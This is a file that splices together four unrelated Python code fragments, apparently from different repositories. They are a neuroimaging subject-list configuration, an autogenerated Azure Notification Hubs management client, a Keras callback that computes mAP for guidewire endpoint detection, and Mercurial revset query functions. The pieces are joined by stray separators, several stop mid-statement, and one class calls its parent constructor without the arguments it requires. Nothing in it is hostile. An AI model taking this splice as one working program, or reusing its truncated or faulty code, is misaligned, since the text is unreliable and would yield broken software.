"604",
"605",
"606",
"607",
"608",
"609",
"610",
"612",
"613",
"614",
"615",
"617",
"618",
"619",
"620",
"621",
"622",
"623",
"624",
"625",
"626",
"627",
"629",
"630",
"631",
"633",
"634",
]
subjects = [
"464",
"465",
"467",
"468",
"469",
"470",
"502",
"503",
"571",
"572",
"573",
"574",
"577",
"578",
"581",
"582",
"584",
"585",
"586",
"587",
"588",
"589",
"591",
"592",
"593",
"594",
"595",
"596",
"597",
"598",
"604",
"605",
"606",
"607",
"608",
"609",
"610",
"612",
"613",
"614",
"615",
"617",
"618",
"619",
"620",
"621",
"622",
"623",
"624",
"625",
"626",
"627",
"629",
"630",
"631",
"633",
"634",
]
# all subjects 102 103 101 104 106 107 108 110 212 X213 214 215 216 217 218 219 320 321 X322 323 324 325
# 327 328 X329 330 331 X332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 451
# X452 453 455 X456 X457 458 459 460 462 463 464 465 467 468 469 470 502 503 571 572 573 574 X575 577 578
# X579 X580 581 582 584 585 586 587 588 589 X590 591 592 593 594 595 596 597 598 604 605 606 607 608 609
# 610 X611 612 613 614 615 X616 617 618 619 620 621 622 623 624 625 626 627 X628 629 630 631 633 634
# errors in fnirt-to-mni: 213, 322, 329, 332, 452, 456, 457, 575, 579, 580, 590, 611, 616, 628
# subjects without post-IQ measure: 452, 461, 501, 575, 576, 579, 583, 611, 616, 628, 105, 109, 211, 213, 322, 326, 329, 332
# subjects for whom preproc didn't run because of motion reasons
# subjects_re = {'217': [0], '334': [1], '335': [1], '453': [1], '463': [0,1], '618': [1], '626': [0]}
data_dir = "/home/data/nbc/physics-learning/data/pre-processed"
sink_dir = "/home/data/nbc/physics-learning/retrieval-graphtheory/output"
lab_notebook_dir = "/home/kbott006/lab_notebook/"
motion_thresh = 0.9
runs = [0, 1, 2]
sessions = [0, 1]
tasks = ["fci"]
sesh = ["pre", "post"]
index = pd.MultiIndex.from_product(
[subjects, tasks, sessions], names=["subject", "task", "session"]
)
lab_notebook = pd.DataFrame(index=index, columns=["start", "end", "errors"])
# | |
<gh_stars>1-10
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
class NotificationHubsOperations(object):
"""NotificationHubsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-04-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-04-01"
self.config = config
def check_notification_hub_availability(
self, resource_group_name, namespace_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Checks the availability of the given notificationHub in a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param parameters: The notificationHub name.
:type parameters:
~azure.mgmt.notificationhubs.models.CheckAvailabilityParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: CheckAvailabilityResult or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.notificationhubs.models.CheckAvailabilityResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_notification_hub_availability.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'CheckAvailabilityParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CheckAvailabilityResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_notification_hub_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/checkNotificationHubAvailability'}
def create_or_update(
self, resource_group_name, namespace_name, notification_hub_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Creates/Update a NotificationHub in a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param parameters: Parameters supplied to the create/update a
NotificationHub Resource.
:type parameters:
~azure.mgmt.notificationhubs.models.NotificationHubCreateOrUpdateParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NotificationHubResource or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.notificationhubs.models.NotificationHubResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'NotificationHubCreateOrUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NotificationHubResource', response)
if response.status_code == 201:
deserialized = self._deserialize('NotificationHubResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}'}
def delete(
self, resource_group_name, namespace_name, notification_hub_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a notification hub associated with a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}'}
def get(
self, resource_group_name, namespace_name, notification_hub_name, custom_headers=None, raw=False, **operation_config):
"""Lists the notification hubs associated with a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NotificationHubResource or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.notificationhubs.models.NotificationHubResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NotificationHubResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}'}
def create_or_update_authorization_rule(
self, resource_group_name, namespace_name, notification_hub_name, authorization_rule_name, properties, custom_headers=None, raw=False, **operation_config):
"""Creates/Updates an authorization rule for a NotificationHub.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param authorization_rule_name: Authorization Rule Name.
:type authorization_rule_name: str
:param properties: Properties of the Namespace AuthorizationRules.
:type properties:
~azure.mgmt.notificationhubs.models.SharedAccessAuthorizationRuleProperties
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SharedAccessAuthorizationRuleResource or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.notificationhubs.models.SharedAccessAuthorizationRuleResource
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = models.SharedAccessAuthorizationRuleCreateOrUpdateParameters(properties=properties)
# Construct URL
url = self.create_or_update_authorization_rule.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'authorizationRuleName': self._serialize.url("authorization_rule_name", authorization_rule_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'SharedAccessAuthorizationRuleCreateOrUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SharedAccessAuthorizationRuleResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_authorization_rule.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}/AuthorizationRules/{authorizationRuleName}'}
def delete_authorization_rule(
self, resource_group_name, namespace_name, notification_hub_name, authorization_rule_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a notificationHub authorization rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param authorization_rule_name: Authorization Rule Name.
:type authorization_rule_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside | |
import keras.backend as K
import cv2, time, os
import numpy as np
import model as modellib
from skimage import morphology
class MAPCallback:
def __init__(self,
model,
val_dataset,
class_names,
threshold=5,
inference_num=50,
batch_size=1,
old_version=False):
super(MAPCallback, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
self.old_version = old_version
def _voc_ap(self, rec, prec):
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
pred_res_0 = []
pred_res_1 = []
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
if self.old_version:
pred_res_0.append([i, 0, out_score, det_point[1] + 1, det_point[0] + 1])
else:
pred_res_0.append([i, 0, out_score * out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
# print([i, 0, out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
if self.old_version:
pred_res_1.append([i, 1, out_score, det_point[1] + 1, det_point[0] + 1])
else:
pred_res_1.append([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
# print([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
pred_res_0 = nms_point(pred_res_0, 10)
pred_res_1 = nms_point(pred_res_1, 10)
pred_res.extend(pred_res_0)
pred_res.extend(pred_res_1)
true_res[i] = point # [num_guidewire, num_point, 2]
# print(point)
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def on_epoch_end(self, logs=None):
logs = logs or {}
K.set_learning_phase(0)
true_res, pred_res = self.calculate_result()
for th in [3, 5, 7, 9]:
APs = self.compute_aps(true_res, pred_res, th)
for cls in range(self.num_classes):
if cls in APs:
print(self.class_names[cls] + ' ap: ', APs[cls])
mAP = np.mean([APs[cls] for cls in APs])
print('mAP: ', mAP)
logs['mAP'] = mAP
def nms_point(point_list, thresh):
'''point_list: [i, point_id, score, x, y]'''
keep = []
while point_list:
keep.append(point_list[0])
now = point_list[0]
del point_list[0]
del_inds = []
for i in range(len(point_list)):
dis_square = np.square(point_list[i][3] - now[3]) + np.square(point_list[i][4] - now[4])
if dis_square < thresh * thresh:
del_inds.append(i)
if del_inds:
del_inds.reverse()
for i in del_inds:
del point_list[i]
return keep
class MAPCallbackSame(MAPCallback):
def __init__(self,
model,
val_dataset,
class_names,
threshold=5,
inference_num=50,
batch_size=1):
super(MAPCallbackSame, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
def compute_point(self, pred, thresh, sigma):
point = -1 * np.ones((2, 2), np.int32)
idx = np.unravel_index(pred.argmax(), pred.shape)
# print(pred.shape)
if pred[idx[0], idx[1]] > thresh:
point[0] = [idx[0], idx[1]]
minus = makeGaussian(pred.shape[0], pred.shape[1], sigma, (idx[1], idx[0])) * pred[idx[0], idx[1]]
pred = pred - minus
idx_1 = np.unravel_index(pred.argmax(), pred.shape)
if pred[idx_1[0], idx_1[1]] > thresh:
point[1] = [idx_1[0], idx_1[1]]
return point
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = self.compute_point(out_mask[:, :, 0], 0.1, 6)
pred_res.append([i, 0, out_score, det_point[0][1] + 1, det_point[0][0] + 1])
pred_res.append([i, 0, out_score, det_point[1][1] + 1, det_point[1][0] + 1])
# print([i, 0, out_score, det_point[0][1], det_point[0][0]])
# print([i, 0, out_score, det_point[1][1], det_point[1][0]])
true_res[i] = point # [num_guidewire, num_point, 2]
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
guidewires = np.reshape(guidewires, [guidewires.shape[0] * guidewires.shape[1], 1, 2])
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def makeGaussian(height, width, sigma=3, center=None):
""" make一个高斯核,是生成heatmap的一个部分
"""
x = np.arange(0, width, 1, float)
y = np.arange(0, height, 1, float)[:, np.newaxis]
if center is None:
x0 = width // 2
y0 = height // 2
else:
x0 = center[0]
y0 = center[1]
return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / (sigma ** 2))
class MAPCallbackMask(MAPCallbackSame):
def __init__(self,
model,
val_dataset,
class_names,
threshold=0.1,
inference_num=50,
batch_size=1):
# super(MAPCallbackMask, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
def compute_point_from_mask(self, pred, thresh):
pred = (pred > thresh).astype('uint8')
skeleton = morphology.skeletonize(pred)
fil = np.array([[1, 1, 1], [1, 8, 1], [1, 1, 1]])
conv = cv2.filter2D(np.float32(skeleton), -1, fil)
result = conv == 9
x, y = np.where(result == True)
endpoint = []
num_point = min(len(x), 2)
for i in range(num_point):
endpoint.append(np.array([x[i], y[i]]))
return endpoint
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = self.compute_point_from_mask(out_mask[:, :, 0], self.threshold)
for det_point_i in det_point:
pred_res.append([i, 0, out_score, det_point_i[1] + 1, det_point_i[0] + 1])
# print([i, 0, | |
source.startswith(rev))
return subset.filter(lambda r: _matchvalue(r))
def date(repo, subset, x):
"""``date(interval)``
Changesets within the interval, see :hg:`help dates`.
"""
# i18n: "date" is a keyword
ds = getstring(x, _("date requires a string"))
dm = util.matchdate(ds)
return subset.filter(lambda x: dm(repo[x].date()[0]))
def desc(repo, subset, x):
"""``desc(string)``
Search commit message for string. The match is case-insensitive.
"""
# i18n: "desc" is a keyword
ds = encoding.lower(getstring(x, _("desc requires a string")))
def matches(x):
c = repo[x]
return ds in encoding.lower(c.description())
return subset.filter(matches)
def _descendants(repo, subset, x, followfirst=False):
roots = getset(repo, fullreposet(repo), x)
if not roots:
return baseset()
s = _revdescendants(repo, roots, followfirst)
# Both sets need to be ascending in order to lazily return the union
# in the correct order.
base = subset & roots
desc = subset & s
result = base + desc
if subset.isascending():
result.sort()
elif subset.isdescending():
result.sort(reverse=True)
else:
result = subset & result
return result
def descendants(repo, subset, x):
"""``descendants(set)``
Changesets which are descendants of changesets in set.
"""
return _descendants(repo, subset, x)
def _firstdescendants(repo, subset, x):
# ``_firstdescendants(set)``
# Like ``descendants(set)`` but follows only the first parents.
return _descendants(repo, subset, x, followfirst=True)
def destination(repo, subset, x):
"""``destination([set])``
Changesets that were created by a graft, transplant or rebase operation,
with the given revisions specified as the source. Omitting the optional set
is the same as passing all().
"""
if x is not None:
sources = getset(repo, fullreposet(repo), x)
else:
sources = fullreposet(repo)
dests = set()
# subset contains all of the possible destinations that can be returned, so
# iterate over them and see if their source(s) were provided in the arg set.
# Even if the immediate src of r is not in the arg set, src's source (or
# further back) may be. Scanning back further than the immediate src allows
# transitive transplants and rebases to yield the same results as transitive
# grafts.
for r in subset:
src = _getrevsource(repo, r)
lineage = None
while src is not None:
if lineage is None:
lineage = list()
lineage.append(r)
# The visited lineage is a match if the current source is in the arg
# set. Since every candidate dest is visited by way of iterating
# subset, any dests further back in the lineage will be tested by a
# different iteration over subset. Likewise, if the src was already
# selected, the current lineage can be selected without going back
# further.
if src in sources or src in dests:
dests.update(lineage)
break
r = src
src = _getrevsource(repo, r)
return subset.filter(dests.__contains__)
def divergent(repo, subset, x):
"""``divergent()``
Final successors of changesets with an alternative set of final successors.
"""
# i18n: "divergent" is a keyword
getargs(x, 0, 0, _("divergent takes no arguments"))
divergent = obsmod.getrevs(repo, 'divergent')
return subset & divergent
def draft(repo, subset, x):
"""``draft()``
Changeset in draft phase."""
# i18n: "draft" is a keyword
getargs(x, 0, 0, _("draft takes no arguments"))
phase = repo._phasecache.phase
target = phases.draft
condition = lambda r: phase(repo, r) == target
return subset.filter(condition, cache=False)
def extinct(repo, subset, x):
"""``extinct()``
Obsolete changesets with obsolete descendants only.
"""
# i18n: "extinct" is a keyword
getargs(x, 0, 0, _("extinct takes no arguments"))
extincts = obsmod.getrevs(repo, 'extinct')
return subset & extincts
def extra(repo, subset, x):
"""``extra(label, [value])``
Changesets with the given label in the extra metadata, with the given
optional value.
If `value` starts with `re:`, the remainder of the value is treated as
a regular expression. To match a value that actually starts with `re:`,
use the prefix `literal:`.
"""
# i18n: "extra" is a keyword
l = getargs(x, 1, 2, _('extra takes at least 1 and at most 2 arguments'))
# i18n: "extra" is a keyword
label = getstring(l[0], _('first argument to extra must be a string'))
value = None
if len(l) > 1:
# i18n: "extra" is a keyword
value = getstring(l[1], _('second argument to extra must be a string'))
kind, value, matcher = _stringmatcher(value)
def _matchvalue(r):
extra = repo[r].extra()
return label in extra and (value is None or matcher(extra[label]))
return subset.filter(lambda r: _matchvalue(r))
def filelog(repo, subset, x):
"""``filelog(pattern)``
Changesets connected to the specified filelog.
For performance reasons, visits only revisions mentioned in the file-level
filelog, rather than filtering through all changesets (much faster, but
doesn't include deletes or duplicate changes). For a slower, more accurate
result, use ``file()``.
The pattern without explicit kind like ``glob:`` is expected to be
relative to the current directory and match against a file exactly
for efficiency.
If some linkrev points to revisions filtered by the current repoview, we'll
work around it to return a non-filtered value.
"""
# i18n: "filelog" is a keyword
pat = getstring(x, _("filelog requires a pattern"))
s = set()
cl = repo.changelog
if not matchmod.patkind(pat):
f = pathutil.canonpath(repo.root, repo.getcwd(), pat)
files = [f]
else:
m = matchmod.match(repo.root, repo.getcwd(), [pat], ctx=repo[None])
files = (f for f in repo[None] if m(f))
for f in files:
backrevref = {} # final value for: filerev -> changerev
lowestchild = {} # lowest known filerev child of a filerev
delayed = [] # filerev with filtered linkrev, for post-processing
lowesthead = None # cache for manifest content of all head revisions
fl = repo.file(f)
for fr in list(fl):
rev = fl.linkrev(fr)
if rev not in cl:
# changerev pointed in linkrev is filtered
# record it for post processing.
delayed.append((fr, rev))
continue
for p in fl.parentrevs(fr):
if 0 <= p and p not in lowestchild:
lowestchild[p] = fr
backrevref[fr] = rev
s.add(rev)
# Post-processing of all filerevs we skipped because they were
# filtered. If such filerevs have known and unfiltered children, this
# means they have an unfiltered appearance out there. We'll use linkrev
# adjustment to find one of these appearances. The lowest known child
# will be used as a starting point because it is the best upper-bound we
# have.
#
# This approach will fail when an unfiltered but linkrev-shadowed
# appearance exists in a head changeset without unfiltered filerev
# children anywhere.
while delayed:
# must be a descending iteration. To slowly fill lowest child
# information that is of potential use by the next item.
fr, rev = delayed.pop()
lkr = rev
